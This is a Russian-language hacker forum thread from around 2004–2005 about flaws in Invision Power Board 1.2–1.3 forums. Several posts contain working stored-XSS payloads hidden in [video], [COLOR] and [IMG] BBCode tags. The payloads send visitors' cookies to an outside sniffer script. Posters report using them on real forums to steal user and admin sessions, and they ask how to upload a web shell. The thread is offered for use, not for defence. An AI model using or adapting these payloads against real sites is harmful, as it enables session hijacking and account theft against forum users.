Вопрос про уязвимости в Invision Power Board(U) v1.3 Final

Discussion in 'Песочница' started by Майор, 20 Dec 2004.

Thread Status:
Not open for further replies.
  1. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
    Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team


    На таких форумах баги есть ???
    надо вытащиьт пароль юзера (хоть в хэше)
     
  2. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Ура! я нашёл эту тему у вас.... мне хотелось бы найти информацию по этой версии... хоть чтонибуть. спасибо.
     
  3. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Давече в логах снифера видел куки с такоко форома ...
    Обыскался куда туда можно вставить скрипт снифера ... не нашёл ... подскажите кто знает ...
     
  4. bad_boy

    bad_boy Elder - Старейшина

    Joined:
    30 Dec 2004
    Messages:
    187
    Likes Received:
    33
    Reputations:
    3
    2 Майор
    А где это форум???
    Ссылку дай!
     
  5. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    из того форума скрипт потёрли сразу ...
    но вот ещё один :
    http://offklan.lamkam.net/forum/index.php?showtopic=26 (на этой стронице скрипт)

    вот пост :
    <!-- THE POST 152 -->
    <div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:document.images[12].src=&quot;http://antichat.ru/cgi-bin/s.jpg?&quot;+document.cookie) <i>А</i> если я буду писать раз в неделю нормально будет ? </div>
    <!-- THE POST -->
    ща буду разбираться ..... , кстате объясните кто знает, что значит символ "`" в html (мне кажется что это что то типо "goto" в С++ ) ???
     
    #5 Майор, 30 Dec 2004
    Last edited: 30 Dec 2004
  6. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Вот так выглядит скрипт :

    [video]http://1.ru e=` [/video]` style=display:none;background:url(javascript:document.images[10].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie) No smoking

    "No smoking" - в место это текст
    Если в 10 кодировке зделать, то ваще без палева :)
     
  7. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    Это значит что форум взломан =))) молодец чувак! Уважуха!
     
  8. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    вот только не навсех пашет =\... почему? уже пропатчены? версия таже... хмммм...
     
  9. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
  10. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Там просто отключены теги вставления видео, картинок в пост, причём в некоторых форумах кнопка на тегу [video] убрана, но она работает...
     
    #10 Майор, 30 Dec 2004
    Last edited: 30 Dec 2004
  11. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    всё я просёк на каких пашет. Должнабыть приписка


    MyBoard 1.3.0.9.142 © 2004 Elvis271 & 3DT


    я же пользовался вот так:

    [video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
     
  12. bad_boy

    bad_boy Elder - Старейшина

    Joined:
    30 Dec 2004
    Messages:
    187
    Likes Received:
    33
    Reputations:
    3
    Блин, нада уязвимость на IPB 1.3.1 Final Rus
    Ничё из нета ненадыбал. Всё пропатчено. Походу идеальный форум, но таких ведь небывает!!! Кто чё знает хелп плиз
     
  13. Fargus

    Fargus New Member

    Joined:
    4 Jan 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Является одним из самых защищенных форумов на сегодняшний день. Багов в 1.3.1 я сам не видел, и в нете постов тоже не замечал. Поэтому и юзаю этот форум =)
     
  14. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    185
    Likes Received:
    118
    Reputations:
    171
    Ревята срочно нужна помащ в
    Code:
    Powered by Invision Power Board(U) v1.2 © 2003  IPS, Inc.
    Русский Модифицированный IPB v1.2 © 2003 BesTFileZ.Net
    эта бага сработала на ура (к стате респест Algol`у за находку)
    PHP:
    [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]
    вот толко форум там мёртвый так что куки админа хрен даждешся , а мне их база розарез нужна. ножет подскажите как туда шелл залить
     
  15. >>ElvI$<<

    >>ElvI$<< Elder - Старейшина

    Joined:
    12 Jan 2005
    Messages:
    42
    Likes Received:
    4
    Reputations:
    -3
    Никак,если ты не имеешь кеша админа или модера.
     
  16. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    А как модератор шел залить может ?
     
Loading...
Thread Status:
Not open for further replies.